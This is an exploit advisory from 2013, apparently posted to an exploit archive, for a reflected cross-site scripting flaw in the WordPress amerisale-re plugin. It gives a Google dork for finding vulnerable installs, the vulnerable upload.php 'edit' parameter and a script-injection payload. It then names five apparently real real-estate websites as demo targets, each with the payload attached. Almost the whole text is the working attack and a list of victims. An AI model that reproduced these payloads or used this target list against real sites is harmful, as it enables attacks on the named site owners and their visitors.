#********************************************************************
# Exploit Title : Wordpress amerisale-re plugin Cross site scripting
#
# Exploit Author : Ashiyane Digital Security Team
#
# Vendor Homepage : http://wordpress.org
#
# Google Dork : inurl :wp-content/plugins/amerisale-re
#
# Date: 2013-11-26
#
# Tested on: Windows 7 , Linux
#######################
# Exploit : Cross site scripting
#
# Location :
[Target]wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=[xss]
#
# Script For Test : "/><script>alert(1);</script>
######################
# Demo:
#
#
http://bexleyproperties.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
#
http://c21lynch.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
#
http://garrybrownrealestate.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
#
http://lexingtontexasrealestate.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
#
http://pudowensrealty.com/wp-content/plugins/amerisale-re/netriesdetail/upload.php?edit=
"/><script>alert(1);</script>
#
######################
discovered by : ACC3SS
######################